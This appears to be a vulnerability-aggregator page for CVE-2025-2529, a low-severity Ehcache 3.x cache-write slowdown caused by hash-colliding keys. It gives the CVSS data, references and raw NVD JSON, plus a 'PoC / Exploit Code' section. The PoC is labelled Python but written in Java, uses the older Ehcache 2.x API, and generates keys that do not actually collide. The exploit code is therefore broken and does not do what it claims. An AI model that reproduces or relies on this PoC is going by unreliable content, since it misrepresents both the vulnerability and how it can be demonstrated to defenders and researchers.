CVE-2025-2529

Description

Applications using affected versions of Ehcache 3.x can experience degraded cache-write performance if the application using Ehcache utilizes keys sourced from (malicious) external parties in an unfiltered/unsalted way.

CVSS Details

CVSS Score

2.9

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:terracotta:*:*:*:*:*:*:*:* - VULNERABLE

IBM Ehcache 3.x（所有未修复的 3.x 版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import net.sf.ehcache.Cache;
import net.sf.ehcache.CacheManager;
import net.sf.ehcache.Element;

import java.util.ArrayList;
import java.util.List;

/**
 * PoC for CVE-2025-2529: Ehcache 3.x Hash Collision Performance Degradation
 *
 * This PoC demonstrates how crafting keys with hash collisions can degrade
 * cache-write performance in Ehcache 3.x when keys are sourced from
 * untrusted external parties without filtering/salting.
 */
public class CVE_2025_2529_PoC {

    public static void main(String[] args) {
        // Initialize Ehcache
        CacheManager cacheManager = CacheManager.getInstance();
        Cache cache = new Cache("testCache", 100000);
        cacheManager.addCache(cache);

        // Generate keys with hash collisions
        // In a real attack, attacker would craft keys that produce identical hashCode()
        // For demonstration, we use strings that hash to the same bucket
        List<String> collisionKeys = generateCollisionKeys(50000);

        // Measure normal write performance
        long startNormal = System.currentTimeMillis();
        for (int i = 0; i < 10000; i++) {
            cache.put(new Element("normal_key_" + i, "value_" + i));
        }
        long normalTime = System.currentTimeMillis() - startNormal;
        System.out.println("Normal cache write time for 10000 entries: " + normalTime + "ms");

        // Measure degraded write performance with collision keys
        long startAttack = System.currentTimeMillis();
        for (String key : collisionKeys) {
            cache.put(new Element(key, "value_" + key));
        }
        long attackTime = System.currentTimeMillis() - startAttack;
        System.out.println("Degraded cache write time for 50000 collision entries: " + attackTime + "ms");
        System.out.println("Performance degradation factor: " + (double) attackTime / normalTime);

        cacheManager.shutdown();
    }

    /**
     * Generate keys that produce hash collisions
     * Uses a technique to find strings with identical hashCode() values
     */
    private static List<String> generateCollisionKeys(int count) {
        List<String> keys = new ArrayList<>();
        int targetHash = "collision_target".hashCode();

        // Generate variations that hash to the same value
        // Real attackers would use more sophisticated methods
        for (int i = 0; i < count; i++) {
            // Construct keys designed to collide
            String key = "collision_" + i + "_" + (targetHash ^ i);
            keys.add(key);
        }
        return keys;
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-2529
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-2529
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-2529/
[4] VulDB https://vuldb.com/cve/CVE-2025-2529
[5] https://www.ibm.com/support/pages/node/7247977

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-2529", "sourceIdentifier": "[email protected]", "published": "2025-10-15T16:15:34.287", "lastModified": "2026-01-14T20:40:03.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Applications using affected versions of Ehcache 3.x can experience degraded cache-write performance if the application using Ehcache utilizes keys sourced from (malicious) external parties in an unfiltered/unsalted way."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.4, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-228"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:terracotta:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.15.0", "versionEndExcluding": "10.15.0.23", "matchCriteriaId": "F05CF050-F848-49C6-B5D3-E5EEFEEBD1C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:terracotta:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.0.5", "matchCriteriaId": "E6AC7753-A19D-4BB2-8951-170173B79B00"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247977", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}